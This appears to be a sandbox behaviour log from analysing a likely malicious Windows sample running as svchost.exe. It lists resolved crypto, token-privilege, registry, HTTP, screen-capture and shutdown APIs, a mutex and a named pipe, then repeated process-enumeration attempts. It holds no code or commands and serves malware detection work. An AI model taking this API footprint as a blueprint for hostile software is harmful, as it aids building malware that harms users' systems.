Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x76690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x75690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 True 1
Fn
System Get Info type = Operating System True 2
Fn
Module Get Filename process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260 True 1
Fn
Mutex Create mutex_name = E58EFF540968A436E982FCFA1C0445A2 True 1
Fn
Thread 0x594
(Host: 2, Network: 0)
+
Category Operation Information Success Count Logfile
File Create Pipe pipe_name = \device\namedpipe\d3b6c4de8cf79a854b549ee232f08c89, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, max_instances = 255 True 1
Fn
System Sleep duration = -1 (infinite) False 1
Fn
Thread 0x7bc
(Host: 3417, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x77ccfda0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
